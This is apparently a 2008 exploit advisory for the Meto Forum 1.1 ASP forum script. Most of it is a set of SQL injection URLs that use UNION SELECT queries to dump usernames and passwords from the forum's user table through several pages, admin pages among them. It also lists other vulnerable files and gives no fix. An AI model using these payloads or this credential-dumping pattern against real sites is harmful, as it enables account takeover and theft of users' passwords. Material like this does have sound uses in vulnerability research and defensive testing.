Meto Forum 1.1 Multiple Remote SQL Injection Vulnerabilities

2008-05-13 00:00:00

-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\

Meto Forum v1.1 Multiple Remote SQL Ä°injectin Vulnerable

Script : http://www.aspindir.com/goster/5444

Risk : Forum in All users saved password is to take.

Coded : Asp , SQL Language = 'Acces'

-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-/


EÄ°P [1] Exploit:


http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test


Log in Admin Panel > cookie Saved ,
This Script file have SQL Ä°njectin atack.


http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1 2,3,4,5,6


http://localhost:2222/lab/MetoForumV1/forum/admin/duzenle.asp?id=1+union+select+0,kullanici,parola,3,4,5,1+from+uyeler



http://localhost:2222/lab/MetoForumV1/forum/admin_oku.asp?id=1%20union%20select%200,1,2,3,4,5,1,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,7,8,9,1,1,1,1%20from%20uyeler



[ESP][2]

Other have sql injection atack file :

uye.asp
oku.asp

-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-



Discovered By U238 |Ugur Can Engin |

Web - Designer Developer Solutions

setuid.noexec0x1[at[hotmail[d0t]com

pgp key --> http://ugurcan.by.ru/U238.asc

Friends --> < Teyfik Cevik - ka0x - The_BekiR - Erhan Bulut - Caborz - Nettoxic - fahn - ZeberuS >

Dunyanın En buyuk Ve En Zeki Lideri Olan Mustafa Kemal Ataturk'u Selamlarım.

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.